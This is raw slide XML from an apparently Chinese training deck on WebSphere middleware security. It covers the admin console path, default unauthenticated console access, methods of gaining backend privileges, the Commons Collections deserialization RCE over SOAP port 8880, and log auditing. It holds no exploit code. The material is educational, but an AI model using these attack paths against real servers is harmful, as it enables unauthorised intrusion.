                <a:latin typeface="Droid Sans Fallback"/>
                <a:cs typeface="Droid Sans Fallback"/>
              </a:rPr>
              <a:t>管理的使用</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Droid Sans Fallback"/>
              <a:cs typeface="Droid Sans Fallb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851" y="1597723"/>
            <a:ext cx="320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http://hostname:9090/admin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111" y="1996439"/>
            <a:ext cx="10174224" cy="4472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596453"/>
            <a:ext cx="1123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管理界面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3307" y="1130808"/>
            <a:ext cx="9750552" cy="5727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596453"/>
            <a:ext cx="1123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3016" y="1309116"/>
            <a:ext cx="9288780" cy="531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5028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/>
              <a:t>中间件的分类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33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{933AF09D-BF9A-B345-8DA8-4BB04C9E82C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116914" y="2346046"/>
            <a:ext cx="10236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0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans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事务处理监控中间件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-Han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r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="24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77800" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone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随着分布计算技术的发展，分布应用系统对大规模的事务处理也提出了需求。事务处理监控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位于客户和服务器之问，完成事务</a:t>
            </a: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管理与协调、负载平衡、失效恢复等任务，提高系统的整体性能。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r>
              <a:rPr lang="zh-Hans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常见的事务处理中间件：</a:t>
            </a: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0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-Han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0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-Han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4883F1FE-AAE3-AA4F-84F3-D8A85B62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3" y="4647084"/>
            <a:ext cx="4035017" cy="18418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88F6984-D0F3-0048-912D-919E9877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872201"/>
            <a:ext cx="4020506" cy="12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8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376" y="1596453"/>
            <a:ext cx="1123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管理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4227" y="1363980"/>
            <a:ext cx="9808464" cy="4655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Websphere</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>后台获取权限的方法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851" y="1597723"/>
            <a:ext cx="943165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5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2150"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="18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6.0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ND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版安装完成后，在缺省情况下通过浏览器进入管理控制台是不需要进行 安全认证的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270"/>
            <a:ext cx="12192000" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12192000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192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7361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反序列化漏洞对</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Websphere</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的影响</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018032" y="1985772"/>
            <a:ext cx="9904730" cy="1323340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="1323339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="1322831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13228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3777" y="1980793"/>
            <a:ext cx="9914255" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9909403" y="1332966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1332966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1332738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1329677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1328204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323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="1329677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="1332738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1332966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="13335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333500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1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403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1333500">
                <a:moveTo>
                  <a:pt x="9525" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9904641" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1333500">
                <a:moveTo>
                  <a:pt x="9914166" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="13282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8032" y="3476244"/>
            <a:ext cx="9904730" cy="585470"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="585470">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="585215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5852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3777" y="3471798"/>
            <a:ext cx="9914255" cy="594360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9909390" y="594296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="594296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="594067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="593394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="592340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="991415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84771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="592340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="593394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="594067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="594296"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="5943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594360">
                <a:moveTo>
                  <a:pt x="990462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28" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9904628" y="589534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="589534"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9914153" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909390" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9525" y="589534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589534"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9904628" y="589534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904628" y="589534"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9914153" y="589534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904628" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909390" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914153" y="58953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9851" y="1444539"/>
            <a:ext cx="10283190" cy="36544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Java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反序列化漏洞之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Commons Collections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65"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>描述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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>年的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Apache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Commons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Collections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反序列化远程命令执行漏洞，其当初影响范围包括</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WebSphere</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Jenkins</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WebLogic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和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="90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OpenNMSd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>等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2016</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Spring RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>反序列化漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>；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2017</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>年比较出名的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-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Jackson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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FastJson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WebSphere</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的反序列化漏洞发生的位置在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SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的通信端口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8880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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>使用的通信协议是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>发送的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:endParaRPr sz="16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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>格式的数据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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IBM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WebSphere</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> java</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>反序列化漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.mottoin.com/98204.html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2507" y="3811270"/>
            <a:ext cx="1270000" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270000" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1269492" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12694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18540" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1018540" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1018032" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101803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507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Websphere</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的日志审计</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018032" y="1985772"/>
            <a:ext cx="9904730" cy="585470"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="585469">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="585215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5852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3777" y="1980793"/>
            <a:ext cx="9914255" cy="594360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9909403" y="594296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="594296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="594067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="593394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="592340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="589534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84771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="591007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="592340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="593394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="594067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="594296"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="5943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594360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594360">
                <a:moveTo>
                  <a:pt x="9904641" y="589534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584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="589534"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360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594360">
                <a:moveTo>
                  <a:pt x="9525" y="589534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="589534"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9904641" y="589534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="589534"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="594360">
                <a:moveTo>
                  <a:pt x="9914166" y="589534"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904641" y="589534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="584771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="58953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8032" y="2767583"/>
            <a:ext cx="9904730" cy="1569720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9904730" h="1569720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904476" y="1569720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156972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777" y="2762148"/>
            <a:ext cx="9914255" cy="1579245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9914255" h="1579245">
                <a:moveTo>
                  <a:pt x="9909403" y="1579194"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1579194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1578279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1577225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1575904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99141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569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913924" y="1575904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9913251" y="1577225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9912197" y="1578279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9910864" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1579194"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1579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914255" h="1579245">
                <a:moveTo>
                  <a:pt x="99046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904641" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1579245">
                <a:moveTo>
                  <a:pt x="9904641" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904641" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1574431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1579245">
                <a:moveTo>
                  <a:pt x="9914166" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9909403" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1579245">
                <a:moveTo>
                  <a:pt x="9525" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1579245">
                <a:moveTo>
                  <a:pt x="9904641" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1574431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9914255" h="1579245">
                <a:moveTo>
                  <a:pt x="9914166" y="1574431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9904641" y="1574431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9909403" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="1569669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914166" y="15744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443106"/>
            <a:ext cx="10283190" cy="283527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WebSphere</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="1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的常用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log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endParaRPr sz="1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1075"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
